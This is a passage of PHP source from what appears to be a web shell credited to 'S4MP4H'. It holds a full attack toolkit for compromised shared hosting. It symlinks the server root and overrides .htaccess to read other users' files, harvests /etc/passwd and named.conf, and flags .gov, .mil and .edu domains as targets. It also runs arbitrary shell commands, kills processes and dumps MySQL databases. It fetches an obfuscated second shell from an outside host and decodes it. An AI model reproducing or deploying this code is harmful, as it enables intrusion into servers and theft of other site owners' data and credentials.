2580$w = @fwrite($f,$r);
2581fclose($f);
2582}
2583}
2584if(isset($_POST['dellpass'])) {
2585if(file_exists('passwd.txt')){
2586@unlink('passwd.txt');
2587@unlink('sym/.htaccess');
2588@unlink('sym/root');
2589@rmdir('sym');
2590}
2591}
2592if($w or @filesize('passwd.txt') > 0){
2593echo "<br/><center><div>[Symlink] : <span class='gaya'>Try Read -> [ /etc/passwd ]</span> <form action='' method='post'><input class='inputzbut' type='submit' value='Cancel' name='dellpass'/></form></center>";
2594echo "<br/><div class='sym'><table border='1' bordercolor='#333333' width='500' cellpadding='1' cellspacing='0' class='sortable'><thead><th style='width:40px;padding:0px;'>No</th><th>Users</th><th style='width:30px;padding:0px;'>FTP</th><th style='width:50px;padding:0px;'>Symlink</th></thead><tbody>";
2595$fil3 = file('passwd.txt');
2596$pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].$alamat;
2597$total = 0;
2598$no = 1;
2599foreach ($fil3 as $f){
2600$u=explode(':', $f);
2601$user = $u['0'];
2602echo "
2603<tr>
2604<td align='center'>".$no++."</td>
2605<td>
2606$user
2607</td>
2608<td align='center'>
2609<a href='$pageFTP/sym/root/home/$user/public_html' target='_blank' class='gaya'>FTP</a>
2610</td>
2611<td align='center'>
2612<a href='$alamat/sym/root/home/$user/public_html' target='_blank' class='gaya'>Symlink</a>
2613</td>
2614</tr>";
2615$total++;
2616}
2617echo "</tbody><tfoot><th>Totals</th><th colspan='3'>Founded ".$total." Users For Symlink</th></tfoot></table></div>";
2618}
2619else {
2620if(isset($_POST['sympass'])) {
2621@mkdir('sym',0755);
2622$htaccess = "Options all \n DirectoryIndex syntax.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
2623$write =@fopen ('sym/.htaccess','w');
2624fwrite($write ,$htaccess);
2625@symlink('/','sym/root');
2626echo "<br/><center><div>[Symlink] : <span class='gaya'>Try Read -> [ /etc/passwd ]</span> <form action='' method='post'><input class='inputzbut' type='submit' value='Cancel' name='symcan'/></form></center>";
2627echo "<br/><form method='post' action=''><textarea width='500' rows='10' name='file' class='outputz'>";
2628flush();
2629$file = '/etc/passwd';
2630$r3ad = @fopen($file, 'r');
2631if ($r3ad){
2632$content = @fread($r3ad, @filesize($file));
2633echo "".htmlentities($content)."";
2634}
2635elseif(!$r3ad)
2636{
2637$r3ad = @show_source($file) ;
2638echo "Can't Read -> [ /etc/passwd ]";
2639}
2640elseif(!$r3ad)
2641{
2642$r3ad = @highlight_file($file);
2643}
2644elseif(!$r3ad)
2645{
2646 for($uid=0;$uid<1000;$uid++){
2647$ara = posix_getpwuid($uid);
2648if (!empty($ara)) {
2649while (list ($key, $val) = each($ara)){
2650print "$val:";
2651}
2652print "\n";
2653}
2654}
2655}
2656flush();
2657echo "</textarea><br /><br /><input type='submit' value='Symlink' name='submitcmd' class='inputzbut'/></form>";
2658}
2659else {
2660if(isset($_POST['symcan'])) {
2661@unlink('sym/.htaccess');
2662@unlink('sym/root');
2663@rmdir('sym');
2664echo "<br/><center><div>[Symlink] : <span class='gaya'>Try Read -> [ /etc/passwd ]</span> <form action='' method='post'><input class='inputzbut' type='submit' value='Symlink' name='sympass'/></form></center>";
2665}
2666else {
2667echo "<br/><center><div>[Symlink] : <span class='gaya'>Try Read -> [ /etc/passwd ]</span> <form action='' method='post'><input class='inputzbut' type='submit' value='Symlink' name='sympass'/></form></center>";
2668}
2669}
2670}
2671}
2672elseif(isset($_GET['x']) && ($_GET['x'] == 'symlink'))
2673{
2674?>
2675<form action="?y=<?php echo $pwd; ?>&x=symlink" method="post">
2676<?php
2677@set_time_limit(0);
2678echo "<center><div>";
2679$filelocation = basename(__FILE__);
2680$read_named_conf = @file('/etc/named.conf');
2681if($read_named_conf){
2682@mkdir('sym',0755);
2683$htaccess = "Options all \n DirectoryIndex syntax.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
2684$write =@fopen ('sym/.htaccess','w');
2685fwrite($write ,$htaccess);
2686@symlink('/','sym/root');
2687if(isset($_POST['cansym'])) {
2688@unlink('sym/.htaccess');
2689@unlink('sym/root');
2690@rmdir('sym');
2691echo "<br/>[Symlink] : <span class='gaya'>Success Read -> [ /etc/named.conf ]</span> <form action='?y=".$pwd."&x=symlink' method='post'><input type='submit' class='inputzbut' name='symcmd' value='Symlink'></form>";
2692}
2693else {
2694echo "<br/>[Symlink] : <span class='gaya'>Success Read -> [ /etc/named.conf ]</span> <form action='?y=".$pwd."&x=symlink' method='post'><a href='?y=".$pwd."&x=symlinks' class='no'><input class='inputzbut' type='button' value='Bypass' name='sympass'/></a><input type='submit' class='inputzbut' name='cansym' value='Cancel'>";
2695echo "</form><br/><br/><div class='sym'><table border='1' bordercolor='#333333' width='500' cellpadding='1' cellspacing='0' class='sortable'><thead><th style='width:40px;padding:0px;'>No</th><th>Domains</th><th>Users</th><th style='width:50px;padding:0px;'>Symlink</th></thead><tbody>";
2696$total = 0;
2697$no = 1;
2698foreach($read_named_conf as $subject){
2699if(eregi('zone',$subject)){
2700preg_match_all('#zone "(.*)"#',$subject,$string);
2701flush();
2702if(strlen(trim($string[1][0])) >2){
2703$UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
2704$name = $UID['name'] ;
2705@symlink('/','sym/root');
2706$name= $string[1][0];
2707$iran= '\.ir';
2708$israel = '\.il';
2709$indo= '\.id';
2710$sg12= '\.sg';
2711$edu= '\.edu';
2712$gov= '\.gov';
2713$gose= '\.go';
2714$gober = '\.gob';
2715$mil1= '\.mil';
2716$mil2= '\.mi';
2717$malay= '\.my';
2718$china= '\.cn';
2719$japan= '\.jp';
2720$austr= '\.au';
2721$porn= '\.xxx';
2722$as= '\.uk';
2723$calfn= '\.ca';
2724if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])
2725or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0])
2726or eregi ("$malay",$string[1][0]) or eregi("$china",$string[1][0]) or eregi("$japan",$string[1][0]) or eregi ("$austr",$string[1][0])
2727or eregi("$porn",$string[1][0]) or eregi("$as",$string[1][0]) or eregi ("$calfn",$string[1][0]))
2728{
2729$name = "<div class='guyu'>".$string[1][0].'</div>';
2730}
2731echo "
2732<tr><td align='center'>".$no++."</td><td><div class='dom'><a target='_blank' href=http://www.".$string[1][0].'/>'.$name.'</a></div></td><td>'.$UID['name']."</td><td align='center'><a href='".$alamat."/sym/root/home/".$UID['name']."/public_html' target='_blank'><span class='gaya'>Symlink</a></td></tr></div>";
2733$total++;
2734flush();
2735}
2736}
2737}
2738echo "</tbody><tfoot><th>Totals</th><th colspan='3'>Founded ".$total." Users For Symlink</th></tfoot></table>";
2739}
2740}
2741else{
2742echo "<br/>[Symlink] : <span class='guyu'>Can't Read -> [ /etc/named.conf ]</span> <form><a href='?y=".$pwd."&x=symlinks' class='no'><input type='button' class='inputzbut' name='symcmd' value='Bypass'/></a></form>";
2743}
2744echo "</center>";
2745}
2746elseif(isset($_GET['x']) && ($_GET['x'] == 'jumpings')){
2747echo "<center><br/><div>";
2748($sm = ini_get('safe_mode') == 0) ?
2749$sm = 'off': die("[Error] : <span class='guyu'>Safemode = ON</span><br/><br/><div class=footer><div class=info>[ Shell By <a href='http://www.alanz.co.de/search/?q=Hacked+By+S4MP4H' target='_blank'><span class='gaya'>".$xName."</span></a> ]</div><div class=jaya>Allright Reserved © ".date("Y",time())." ".$xName."</div></div>");
2750set_time_limit(0);
2751@$passwd = fopen('/etc/passwd','r');
2752if (!$passwd){
2753die ("[Error] : <span class='guyu'>Can't Read -> [ /etc/passwd ]</span><br/><br/><div class=footer><div class=info>[ Shell By <a href='http://www.alanz.co.de/search/?q=Hacked+By+S4MP4H' target='_blank'><span class='gaya'>".$xName."</span></a> ]</div><div class=jaya>Allright Reserved © ".date("Y",time())." ".$xName."</div></div>");
2754}
2755else{
2756$pubs = array();
2757$users = array();
2758$i = 0;
2759while(!feof($passwd)){
2760$str = fgets($passwd);
2761if ($i > 100){
2762$pos = strpos($str,':');
2763$usr = explode(":", $str);
2764$username = substr($str,0,$pos);
2765$dirz = $usr[5];
2766if (($username != '')){
2767if (is_readable($dirz)){
2768array_push($users,$username);
2769array_push($pubs,$dirz);
2770}
2771}
2772}
2773$i++;
2774}
2775echo "<div class='sym'><table border='1' bordercolor='#333333' width='500' cellpadding='1' cellspacing='0' class='sortable'><thead><th style='width:40px;padding:0px;'>No</th><th>Users</th><th>Path</th><th style='width:50px;padding:0px;'>Jumping</th></thead><tbody>";
2776$total = 0;
2777$no = 1;
2778foreach (array_combine($users, $pubs) as $user => $pub){
2779echo '<tr><td align=\'center\'>'.$no++.'</td><td>'.$user.'</td><td><a href="?y='.$pub.'" class="gaya">'.$pub.'</a></td><td align=\'center\'><a href="?y='.$pub.'" class="gaya" target="_blank">Jumping</a></td></tr>';
2780$total++;
2781}
2782echo "</tbody><tfoot><th>Totals</th><th colspan='3'>Founded ".$total." Users For Jumping</th><tfoot></table></div></div></center>";
2783}
2784}
2785elseif(isset($_GET['x']) && ($_GET['x'] == 'jumping')){
2786echo "<center><br/><div>";
2787($sm = ini_get('safe_mode') == 0) ?
2788$sm = 'off': die("[Error] : <span class='guyu'>Safemode = ON</span><br/><br/><div class=footer><div class=info>[ Shell By <a href='http://www.alanz.co.de/search/?q=Hacked+By+S4MP4H' target='_blank'><span class='gaya'>".$xName."</span></a> ]</div><div class=jaya>Allright Reserved © ".date("Y",time())." ".$xName."</div></div>");
2789set_time_limit(0);
2790@$passwd = fopen('/etc/passwd','r');
2791if (!$passwd){
2792die ("[Error] : <span class='guyu'>Can't Read -> [ /etc/passwd ]</span><br/><br/><div class=footer><div class=info>[ Shell By <a href='http://www.alanz.co.de/search/?q=Hacked+By+S4MP4H' target='_blank'><span class='gaya'>".$xName."</span></a> ]</div><div class=jaya>Allright Reserved © ".date("Y",time())." ".$xName."</div></div>");
2793}
2794else{
2795$pub = array();
2796$users = array();
2797$i = 0; while(!feof($passwd)){
2798$str = fgets($passwd);
2799if ($i > 100){
2800$pos = strpos($str,':');
2801$username = substr($str,0,$pos);
2802$dirz = '/home/'.$username.'/public_html/';
2803if (($username != '')){
2804if (is_readable($dirz)){
2805array_push($users,$username);
2806array_push($pub,$dirz);
2807}
2808}
2809}
2810$i++;
2811}
2812echo "<div class='sym'><table border='1' bordercolor='#333333' width='500' cellpadding='1' cellspacing='0' class='sortable'><thead><th style='width:40px;padding:0px;'>No</th><th>Users</th><th>Path</th><th style='width:50px;padding:0px;'>Jumping</th></thead><tbody>";
2813$total = 0;
2814$no = 1;
2815foreach ($users as $user){
2816echo '<tr><td align=\'center\'>'.$no++.'</td><td>'.$user.'</td><td><a href="?y=/home/'.$user.'/public_html" class="gaya">/home/'.$user.'/public_html/</a></td><td align=\'center\'><a href="?y=/home/'.$user.'/public_html" class="gaya" target="_blank">Jumping</a></td></tr>';
2817$total++;
2818}
2819echo "</tbody><tfoot><th>Totals</th><th colspan='3'>Founded ".$total." Users For Jumping</th><tfoot></table></div></div></center>";
2820}
2821}
2822elseif(isset($_GET['x']) && ($_GET['x'] == 'processes')){
2823function getdisfunc() {
2824$disfunc = @ini_get("disable_functions");
2825if (!empty($disfunc)) {
2826$disfunc = str_replace(" ","",$disfunc);
2827$disfunc = explode(",",$disfunc);
2828}
2829else { $disfunc= array(); }
2830return $disfunc;
2831}
2832function enabled($func) {
2833if ( function_exists($func) && is_callable($func) && !in_array($func,getdisfunc()) ) { return TRUE; }
2834else { return FALSE; }
2835}
2836function fx29exec($cmd) {
2837$output = "";
2838if ( enabled("popen") ) {
2839$h = popen($cmd.' 2>&1', 'r');
2840if ( is_resource($h) ) {
2841while ( !feof($h) ) { $output .= fread($h, 2096); }
2842pclose($h);
2843}
2844}
2845elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
2846elseif ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
2847elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }
2848elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); }
2849return $output;
2850}
2851function fx29exec2($cmd) {
2852$output = "";
2853if ( enabled("shell_exec") ) { $output = shell_exec($cmd); }
2854elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }
2855elseif ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
2856elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
2857elseif ( enabled("popen") ) {
2858$h = popen($cmd.' 2>&1', 'r');
2859if ( is_resource($h) ) {
2860while ( !feof($h) ) { $output .= fread($h, 2096); }
2861pclose($h);
2862}
2863}
2864return $output;
2865}
2866function is_windows() { return strtolower(substr(PHP_OS,0,3)) == "win"; }
2867function tabsort($a,$b) { global $v; return strnatcmp($a[$v], $b[$v]);}
2868function parsesort($sort) {
2869$one = intval($sort);
2870$second = substr($sort,-1);
2871if ($second != "d") {$second = "a";}
2872return array($one,$second);
2873}
2874function disp_error($msg) { echo "<div class=errmsg>$msg</div>\n"; }
2875$auto_surl = TRUE;
2876foreach ($_REQUEST as $k => $v) {
2877if (!isset($$k)) { $$k = $v; }
2878}
2879if ($auto_surl) {
2880$include = "&";
2881foreach (explode("&",getenv("QUERY_STRING")) as $v) {
2882$v= explode("=",$v);
2883$name= urldecode($v[0]);
2884$value= @urldecode($v[1]);
2885$needles = array("http://","https://","ssl://","ftp://","\\\\");
2886foreach ($needles as $needle) {
2887if (strpos($value,$needle) === 0) {
2888$includestr .= urlencode($name)."=".urlencode($value)."&";
2889}
2890}
2891}
2892}
2893if (empty($surl)) { $surl = htmlspecialchars("?".@$includestr); }
2894if (!isset($x)) { $x = "processes"; }
2895if ($x == "processes") {
2896if (!is_windows()) { $handler = "ps aux".($grep?" | grep '".addslashes($grep)."'":""); }
2897else { $handler = "tasklist"; }
2898$ret = fx29exec($handler);
2899if (!$ret) { disp_error("<br/><center>[Process] : <span class='guyu'>Can't Execute \"$handler\"</span></center>"); }
2900else {
2901if (empty($processes_sort)) { $processes_sort = $sort_default; }
2902$parsesort = parsesort($processes_sort);
2903if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
2904$k = $parsesort[0];
2905if ($parsesort[1] != "a") {
2906$y = " <a href=\"".$surl."x=processes&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"http://syntax-errorz.googlecode.com/svn/trunk/ascen.gif\" alt=\"Asc\"></a>";
2907}
2908else {
2909$y = " <a href=\"".$surl."x=processes&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"http://syntax-errorz.googlecode.com/svn/trunk/descen.gif\" alt=\"Dsc\"></a>";
2910}
2911$ret = htmlspecialchars($ret);
2912if (!is_windows()) {
2913if ($pid) {
2914if (is_null($sig)) { $sig = 9; }
2915echo "<br/><center>[Kill] : <span class='gaya'>Sending signal ".$sig." to #".$pid."... </span>";
2916if (posix_kill($pid,$sig)) { echo "<b><span class='gaya'>OK!<span></b>"; } else { echo "<b><span class='guyu'>ERROR!</span></b>"; }
2917echo "</center>";
2918}
2919while (ereg(" ",$ret)) { $ret = str_replace(" "," ",$ret); }
2920$stack = explode("\n",$ret);
2921$head = explode(" ",$stack[0]);
2922unset($stack[0]);
2923for($i=0;$i<count($head);$i++) {
2924if ($i != $k) {
2925$head[$i] = "<div class='hp'><a href=\"".$surl."x=processes&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b class='gaya'>".$head[$i]."</b></a></div>";
2926}
2927}
2928$head[$i] = "<div class='hp'><a><b class='gaya'>KILL</b></a></div>";
2929$prcs = array();
2930foreach ($stack as $line) {
2931if (!empty($line)) {
2932$line = explode(" ",$line);
2933$line[10] = join(" ",array_slice($line,10));
2934$line = array_slice($line,0,11);
2935if ($line[0] == get_current_user()) { $line[0] = "".$line[0].""; }
2936$line[] = "<div align='center'><a href=\"".$surl."x=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\">KILL</a></div>";
2937$prcs[] = $line;
2938}
2939}
2940}
2941else {
2942if (@$pid) {
2943echo "<br/><center>[Kill] : <span class='gaya'>Killing PID ".$pid."... ";
2944echo fx29exec("taskkill /PID $pid /F");
2945echo "</span></center>";
2946}
2947while (ereg(" ",$ret)) { $ret = str_replace(" "," ",$ret); }
2948while (ereg("=",$ret)) { $ret = str_replace("=","",$ret); }
2949$ret = convert_cyr_string($ret,"d","w");
2950$stack = explode("\n",$ret);
2951unset($stack[0],$stack[2]);
2952$stack = array_values($stack);
2953$stack[0] = str_replace("Image Name","Image-Name",$stack[0]);
2954$stack[0] = str_replace("Session Name","Session-Name",$stack[0]);
2955$stack[0] = str_replace("Mem Usage","Memory-Usage",$stack[0]);
2956$stack[0] .= " KILL";
2957$head = explode(" ",$stack[0]);
2958$stack = array_slice($stack,1);
2959$head = array_values($head);
2960if ($parsesort[1] != "a") {
2961$y = " <a href=\"".$surl."x=processes&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"http://syntax-errorz.googlecode.com/svn/trunk/ascen.gif\" alt=\"Asc\"></a>";
2962}
2963else {
2964$y = " <a href=\"".$surl."x=processes&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"http://syntax-errorz.googlecode.com/svn/trunk/descen.gif\" alt=\"Dsc\"></a>";
2965}
2966if ($k > count($head)) {$k = count($head)-1;}
2967for($i=0;$i<count($head);$i++) {
2968if ($i != $k) { $head[$i] = "<div class='hp'><a href=\"".$surl."x=processes&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b class='gaya'>".trim($head[$i])."</b></a></div>"; }
2969}
2970$prcs = array();
2971unset($stack[0]);
2972foreach ($stack as $line) {
2973if (!empty($line)) {
2974$line = explode(" ",$line);
2975$line[4] = str_replace(".","",$line[4]);
2976$line[4] = intval($line[4]) * 1024;
2977unset($line[5]);
2978$line[] = "<div align='center'><a href=\"".$surl."x=processes&d=".urlencode($d)."&pid=".$line[1]."\">KILL</a></div>";
2979$prcs[] = $line;
2980}
2981}
2982}
2983$head[$k] = "<div class='hp'><b class='gaya'>".$head[$k].$y."</b></div>";
2984$v = $processes_sort[0];
2985usort($prcs,"tabsort");
2986if ($processes_sort[1] == "d") { $prcs = array_reverse($prcs); }
2987$tab = array();
2988$tab[] = $head;
2989$tab = array_merge($tab,$prcs);
2990echo "<br/><center><div class='sym'><table border='1' bordercolor='#333333' width='100%' cellpadding='1' cellspacing='0'>\n";
2991foreach($tab as $i=>$k) {
2992echo "\t<tr>";
2993foreach($k as $j=>$v) {
2994if (is_windows() and $i > 0 and $j == 4) { $v = view_size($v); }
2995echo "<td>".$v."</td>";
2996}
2997echo "</tr>\n";
2998}
2999echo "</table></center></div>\n";
3000}
3001}
3002}
3003elseif(isset($_GET['x']) && ($_GET['x'] == 'sql')){
3004function strips(&$arr,$k="") {
3005if (is_array($arr)) { foreach($arr as $k=>$v) { if (strtoupper($k) != "GLOBALS") { strips($arr["$k"]); } } }
3006else { $arr = stripslashes($arr); }
3007}
3008function mysql_dump($set) {
3009$sock = $set["sock"];
3010$db = $set["db"];
3011$print = $set["print"];
3012$nl2br = $set["nl2br"];
3013$file = $set["file"];
3014$add_drop = $set["add_drop"];
3015$tabs = $set["tabs"];
3016$onlytabs = $set["onlytabs"];
3017$ret = array();
3018$ret["err"] = array();
3019if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
3020if (empty($db)) {$db = "db";}
3021if (empty($print)) {$print = 0;}
3022if (empty($nl2br)) {$nl2br = 0;}
3023if (empty($add_drop)) {$add_drop = TRUE;}
3024if (empty($file)) {
3025$file = $tmp_dir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
3026}
3027if (!is_array($tabs)) {$tabs = array();}
3028if (empty($add_drop)) {$add_drop = TRUE;}
3029if (sizeof($tabs) == 0) {
3030$res = mysql_query("SHOW TABLES FROM ".$db, $sock);
3031if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
3032}
3033$out = "
3034# Dumped By S4MP4H
3035# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
3036# Date: ".date("d.m.Y H:i:s")."
3037# DB: \"".$db."\"
3038#---------------------------------------------------------------------------------\n";
3039$c = count($onlytabs);
3040foreach($tabs as $tab) {
3041if ((in_array($tab,$onlytabs)) or (!$c)) {
3042if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
3043$res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
3044if (!$res) {$ret["err"][] = mysql_smarterror();}
3045else {
3046$row = mysql_fetch_row($res);
3047$out .= $row["1"].";\n\n";
3048$res = mysql_query("SELECT * FROM `$tab`", $sock);
3049if (mysql_num_rows($res) > 0) {
3050while ($row = mysql_fetch_assoc($res)) {
3051$keys = implode("`, `", array_keys($row));
3052$values = array_values($row);
3053foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
3054$values = implode("', '", $values);
3055$sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
3056$out .= $sql;
3057}
3058}
3059}
3060}
3061}
3062$out .= " #---------------------------------------------------------------------------------\n";
3063if ($file) {
3064$fp = fopen($file, "w");
3065if (!$fp) {$ret["err"][] = 2;}
3066else {
3067fwrite ($fp, $out);
3068fclose ($fp);
3069}
3070}
3071if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
3072return $out;
3073}
3074function mysql_buildwhere($array,$sep=" and",$functs=array()) {
3075if (!is_array($array)) {$array = array();}
3076$result = "";
3077foreach($array as $k=>$v) {
3078$value = "";
3079if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
3080$value .= "'".addslashes($v)."'";
3081if (!empty($functs[$k])) {$value .= ")";}
3082$result .= "`".$k."` = ".$value.$sep;
3083}
3084$result = substr($result,0,strlen($result)-strlen($sep));
3085return $result;
3086}
3087function mysql_fetch_all($query,$sock) {
3088if ($sock) {$result = mysql_query($query,$sock);}
3089else {$result = mysql_query($query);}
3090$array = array();
3091while ($row = mysql_fetch_array($result)) {$array[] = $row;}
3092mysql_free_result($result);
3093return $array;
3094}
3095function mysql_smarterror($sock) {
3096if ($sock) { $error = mysql_error($sock); }
3097else { $error = mysql_error(); }
3098$error = htmlspecialchars($error);
3099return $error;
3100}
3101function mysql_query_form() {
3102global $submit,$sql_x,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
3103if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br/>".$sql_query_error."<br/>";}
3104if ($sql_query_result or (!$sql_confirm)) {$sql_x = $sql_goto;}
3105if ((!$submit) or ($sql_x)) {
3106echo "<table><tr><td><form name=\"fx29sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else{echo "SQL-Query";} echo ":</b><br/><br/><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br/><br/><input type=hidden name=x value=sql><input type=hidden name=sql_x value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\" class=\"inputzbut\"> <input type=submit value=\"No\" class=\"inputzbut\"></form></td>";
3107if ($tbl_struct) {
3108echo "<td valign=\"top\"><b>Fields:</b><br/>";
3109foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.fx29sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br/>";}
3110echo "</td></tr></table>";
3111}
3112}
3113if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
3114}
3115function mysql_create_db($db,$sock="") {
3116$sql = "CREATE DATABASE `".addslashes($db)."`;";
3117if ($sock) {return mysql_query($sql,$sock);}
3118else {return mysql_query($sql);}
3119}
3120function mysql_query_parse($query) {
3121$query = trim($query);
3122$arr = explode (" ",$query);
3123$types = array(
3124"SELECT"=>array(3,1),
3125"SHOW"=>array(2,1),
3126"DELETE"=>array(1),
3127"DROP"=>array(1)
3128);
3129$result = array();
3130$op = strtoupper($arr[0]);
3131if (is_array($types[$op])) {
3132$result["propertions"] = $types[$op];
3133$result["query"] = $query;
3134if ($types[$op] == 2) {
3135foreach($arr as $k=>$v) {
3136if (strtoupper($v) == "LIMIT") {
3137$result["limit"] = $arr[$k+1];
3138$result["limit"] = explode(",",$result["limit"]);
3139if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
3140unset($arr[$k],$arr[$k+1]);
3141}
3142}
3143}
3144}
3145else { return FALSE; }
3146}
3147function disp_error($msg) { echo "<div class=errmsg>$msg</div>\n"; }
3148function html_style() {
3149$style = '
3150<center>
3151';
3152return $style;
3153}
3154$auto_surl = TRUE;
3155@set_magic_quotes_runtime(0);
3156if (get_magic_quotes_gpc()) { strips($GLOBALS); }
3157foreach ($_REQUEST as $k => $v) {
3158if (!isset($$k)) { $$k = $v; }
3159}
3160if ($auto_surl) {
3161$include = "&";
3162foreach (explode("&",getenv("QUERY_STRING")) as $v) {
3163$v= explode("=",$v);
3164$name= urldecode($v[0]);
3165$value= @urldecode($v[1]);
3166$needles = array("http://","https://","ssl://","ftp://","\\\\");
3167foreach ($needles as $needle) {
3168if (strpos($value,$needle) === 0) {
3169$includestr .= urlencode($name)."=".urlencode($value)."&";
3170}
3171}
3172}
3173}
3174if (empty($surl)) { $surl = htmlspecialchars("?".@$includestr); }
3175if (!isset($x)) { $x = "sql"; }
3176if ($x == "sql") {
3177foreach (array("sort","sql_sort") as $v) {
3178if (!empty($_GET[$v])) { $$v = $_GET[$v]; }
3179if (!empty($_POST[$v])) { $$v = $_POST[$v]; }
3180}
3181if ($sort_save) {
3182if (!empty($sort)) { setcookie("sort",$sort); }
3183if (!empty($sql_sort)) { setcookie("sql_sort",$sql_sort); }
3184}
3185if (!isset($sort)) { $sort = $sort_default; }
3186$sort = htmlspecialchars($sort);
3187$sort[1] = strtolower($sort[1]);
3188echo html_style();
3189echo "<div id='maininfo'>";
3190if ($x == "sql") {
3191$sql_surl = $surl."x=sql";
3192if (!isset($sql_login)) { $sql_login = ""; }
3193if (!isset($sql_passwd)) { $sql_passwd = ""; }
3194if (!isset($sql_server)) { $sql_server = ""; }
3195if (!isset($sql_port)) { $sql_port = ""; }
3196if (!isset($sql_tbl)) { $sql_tbl = ""; }
3197if (!isset($sql_x)) { $sql_x = ""; }
3198if (!isset($sql_tbl_x)) { $sql_tbl_x = ""; }
3199if (!isset($sql_order)) { $sql_order = ""; }
3200if (!isset($sql_x)) { $sql_x = ""; }
3201if (!isset($sql_getfile)) { $sql_getfile = ""; }
3202if (@$sql_login) { $sql_surl .= "&sql_login=".htmlspecialchars($sql_login); }
3203if (@$sql_passwd) { $sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd); }
3204if (@$sql_server) { $sql_surl .= "&sql_server=".htmlspecialchars($sql_server); }
3205if (@$sql_port){ $sql_surl .= "&sql_port=".htmlspecialchars($sql_port); }
3206if (@$sql_db) { $sql_surl .= "&sql_db=".htmlspecialchars($sql_db); }
3207$sql_surl .= "&";
3208echo "";
3209if (@$sql_server) {
3210$sql_sock = @mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
3211$err = mysql_smarterror($sql_sock);
3212@mysql_select_db($sql_db,$sql_sock);
3213if (@$sql_query and $submit) {
3214$sql_query_result = mysql_query($sql_query,$sql_sock);
3215$sql_query_error = mysql_smarterror($sql_sock);
3216}
3217}
3218else { $sql_sock = FALSE; }
3219if (!$sql_sock) {
3220if (!@$sql_server) {
3221if ($_GET['ins'] == "sql") {
3222$sqlshell = file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/sql.php');
3223$file = fopen("sql.php" ,"w+");
3224$write = fwrite ($file ,gzinflate(base64_decode(str_rot13(strrev($sqlshell)))));
3225fclose($file);
3226chmod("sql.php",0644);
3227echo "[Mysql] : Install Done, <a href='".$alamat."/sql.php' target='_blank'>sql.php</a>";
3228}
3229else {
3230echo "[Mysql] : No Connection, <a href='".$surl."x=sql&ins=sql'>Bypass</a>";
3231}
3232}
3233else { disp_error("ERROR: ".$err); }
3234}
3235else {
3236$sqlquicklaunch= array();
3237$sqlquicklaunch[] = array("Index",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
3238$sqlquicklaunch[] = array("Query",$sql_surl."sql_x=query&sql_tbl=".urlencode($sql_tbl));
3239$sqlquicklaunch[] = array("Server status",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=serverstatus");
